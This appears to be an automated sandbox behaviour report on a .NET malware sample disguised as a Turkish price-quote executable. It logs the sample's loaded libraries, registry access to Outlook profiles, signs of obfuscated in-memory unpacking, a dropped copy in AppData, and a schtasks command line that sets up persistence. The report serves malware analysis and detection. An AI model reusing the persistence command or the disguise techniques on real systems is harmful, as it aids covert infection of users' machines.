Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: cYDnGbgU.exe.0.dr, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, bal5aDHGqqusl9PpVH.cs	.Net Code: X73w2lvC5j System.Reflection.Assembly.Load(byte[])
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.2666678.1.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.50a0000.10.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_027D0C55 push edi; retf	8_2_027D0C7A
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Code function: 8_2_067F7CFF push es; ret	8_2_067F7D00
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_018E0C55 push edi; retf	13_2_018E0C7A
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Code function: 13_2_07151AD9 push eax; iretd	13_2_07151AE5

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe	Static PE information: section name: .text entropy: 7.934869907354881
Source: cYDnGbgU.exe.0.dr	Static PE information: section name: .text entropy: 7.934869907354881

Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, Y6tRLDwwu0r7G3xm1c.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YCtoPXZT5U', 'XVSoK2YnEp', 'RXrozrvVXS', 'c1TUbALhlZ', 'PLZU4hGO2d', 'dt7UooRL3y', 'WL9UUypsYF', 'goalTeFohln9lLThDU9'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, AqTBq3Qc48xHs1RJelg.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hfkZmB8TqE', 'ttqZOS4WJK', 'flIZGen8Cf', 'WlIZIOxgQr', 'ByhZv4K6Wa', 'qaQZEdLIXA', 'uNFZlkNvCV'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, iQVun9DtkxRfr6tGwr.cs	High entropy of concatenated method names: 'ydbjr4LKNw', 'kOOjg7Cxpj', 'jRRcxo4Adq', 'KPFcRq6VIE', 'mc4c9gJNh3', 'jyichuAP47', 'mYicTklxCK', 'J8ZcHH01UB', 'aq3cYC550O', 'cXfcCtD0WX'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, qewDnelTwdYfPrGKKS.cs	High entropy of concatenated method names: 'Me2ACCpwX8', 'mbhAptFDqf', 'GhoAmV7DpY', 'l0IAOhogZ7', 'kavAiT2Cgv', 'QbtAxYMURI', 'UwQARZusLM', 'sCOA9XTEW5', 'UefAh7J0Av', 'TVnATsKsQd'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, q3dBfE4CEyf38sODqy.cs	High entropy of concatenated method names: 'IOeVuk48eq', 'i1tVqT4REV', 'iIAV26ZAbf', 'DikV5g3FBu', 'p85VrHa9Ib', 'CGxVkxnrmo', 'ORFVgnynRM', 'zt8VXDhNWM', 'qd4Vd1u0rR', 'ArTV0OqU6L'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, TdWG6QYkwXf5WOH3AH.cs	High entropy of concatenated method names: 'P46WfiLoZH', 'HurWuPOrB1', 'uwTW2BbpHN', 'YtjW5MuSUe', 'w11WkZ2s3E', 'k07WgIypvb', 'hQGWdtWZXO', 'FmaW0AxOsK', 'BHj2xUQ727etFJBsFSO', 'kV4LCBQSCiwLcdM9Z89'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, wYxa99pk5AT5Q8Etp4.cs	High entropy of concatenated method names: 'fMSJX9iKVV', 'vRrJdU4iMt', 'ztdJBBAldV', 'SR0Jipv7ce', 'c9BJRK2CM9', 'V1cJ9mdble', 'G6FJTN9EVc', 'hP0JHe8eHl', 'kEVJCfcPNH', 'stDJFl6oUB'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, er30hWkpx2w8t3ZecR.cs	High entropy of concatenated method names: 'sE076AomCU', 'mWe71smKY0', 'ToString', 'KU373fIwLG', 'mJZ7aeE5Aw', 'Ocn7cfjsDJ', 'lTq7jLQRoY', 'uGw7WHZbit', 'H6h7VaZs7w', 'fYW7sjO4gq'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, akg6bXQVfj049ePpY61.cs	High entropy of concatenated method names: 'GJfNuoEtuw', 'kWYNqVJ2S0', 'JjkN2x57Si', 'XMsN5nemf3', 'xJ9Nrhkl5g', 'XUNNkDXek1', 'kGwNgwhy4O', 'uYSNXSxfyD', 'Q0WNduPJLD', 'cmSN0ujGTP'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, IdJIQ0mrbn0KCZUl6K.cs	High entropy of concatenated method names: 'WFgamTU0rp', 'pBraOo8BAp', 'BJSaGWGnUU', 'uPqaIfxN2r', 'BMEavBRyph', 'bdaaEhTMJO', 'lC4alybybh', 'JbOaQ9OINe', 'J30aP03WBP', 'eOZaKQAbqQ'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, QiAuk79qm4I2n9WpQE.cs	High entropy of concatenated method names: 'mm0L3UcFs7', 'BhLLag8Eve', 'VwaLcwTAaa', 'cH9Ljsmqsg', 'TUqLWruL9j', 'LZTLVlHk2f', 'aNALsJaAp7', 'JQYLyrDLk8', 'HIUL6SqrFt', 'PyTL1UcB53'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, fdH8GvOG7C96TaohFK.cs	High entropy of concatenated method names: 'bqILBQYPjB', 'F6mLi1y8e8', 'SkCLxaS0ox', 'DfxLRHsuMn', 'vfNLmQpvIY', 'wLYL9U85Qm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, hafU4QijkRSw5pLNpG.cs	High entropy of concatenated method names: 'cYxN4kSiHy', 'tAbNU1e6MH', 'd3DNwcajKa', 'XQSN3gKpZW', 'UYFNai54rA', 'hYvNj1LtR6', 'sQpNWBCbON', 'GvpLlxYGSP', 'q5eLQmACo8', 'Sh9LPTiwGk'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, dSQxen83gcaoFn0u9A.cs	High entropy of concatenated method names: 'Kwr7QUQmad', 'Vkm7KRKGpB', 'mDHLb6hYc4', 'mQcL4cBXAt', 'dKa7FUtdf0', 'LaL7pm3xsZ', 'Ajk78nKapu', 'iBH7mfDdmG', 'sZl7OkrgRo', 'Gum7G9qpJX'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, bal5aDHGqqusl9PpVH.cs	High entropy of concatenated method names: 'AbOUMQDhtO', 'xuMU3h9SY5', 'phAUaQWi7H', 'AHlUcMi4ZU', 'MBOUjnYkrg', 'FeKUWhgJ66', 'W5RUVSqBeP', 'iNDUsT9WqG', 'KFpUyviJhQ', 'PNHU6xI4cn'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, yZJiAVX98IA2xsdpYB.cs	High entropy of concatenated method names: 'Dispose', 'ml54PjpJ9f', 'L3EoiEIH14', 'FQMnnUMgt7', 'XBo4KViZmr', 'HcU4zfI7xd', 'ProcessDialogKey', 'yN5ob9jyEl', 'Ff1o4RjibF', 'ytyood9QAy'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, WhCcuxKMektuQl3bUD.cs	High entropy of concatenated method names: 'ToString', 'Da1SFlemKV', 'WhLSiE4Ebn', 'OdRSxTX4c4', 'Dy3SRbDWGH', 'UrpS9reYxP', 'RwVShquE5b', 'LSsSTTt4xu', 'nfySHp6XK7', 'zmpSYNsXLA'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, jfeViXavPeEM9eF108.cs	High entropy of concatenated method names: 'I8u4VgtEV6', 'beu4sQqfGh', 'NL346i8aPP', 'Def411u5tJ', 'ewy4A3Yq3L', 'c8R4SYFMeQ', 'cFdExSdkkOslvRbwv3', 'S83OESBSIYM01MtsIh', 'tXshs8RG8bPUTT0GHB', 'bxQ44ugVPB'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, OafLSZFLDMriEAVQ9R.cs	High entropy of concatenated method names: 's5v2nPNaH', 'EOe5AUSch', 'Mn8k09Tqq', 'ICpgRdDZf', 'eFtdJsmUn', 'wqo0CRkLY', 'WUgJy5N0YvPHJEY6Kh', 'skxekl6Ccd6ogtZZEo', 'YWZLxqbyT', 'BJVZk29i9'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, P4ldvaUb5opVL6IfT5.cs	High entropy of concatenated method names: 'upFWMcHT2s', 'tx0Wad9432', 'Lv4WjkFe9T', 'DfTWVOotha', 'o1bWsaK3cX', 'bcyjvRkp6C', 'HEAjEMbVJV', 'JKdjl9L8R1', 'wMDjQUK7Km', 'gpOjPIrVfb'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, Ml77RDd2wh4oyD1D9p.cs	High entropy of concatenated method names: 'lx2c5kVIVw', 'C7qckyTcsg', 'GtKcXno1Dh', 'CIIcdfBefk', 'S4ScApavIM', 'KTecS9Uw6J', 'TCgc78QEiJ', 'nCJcLdtiN9', 'fWBcN7nIaa', 'H2lcZ1aunr'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.2666678.1.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.2666678.1.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.2666678.1.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.50a0000.10.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.50a0000.10.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.50a0000.10.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

File created: C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
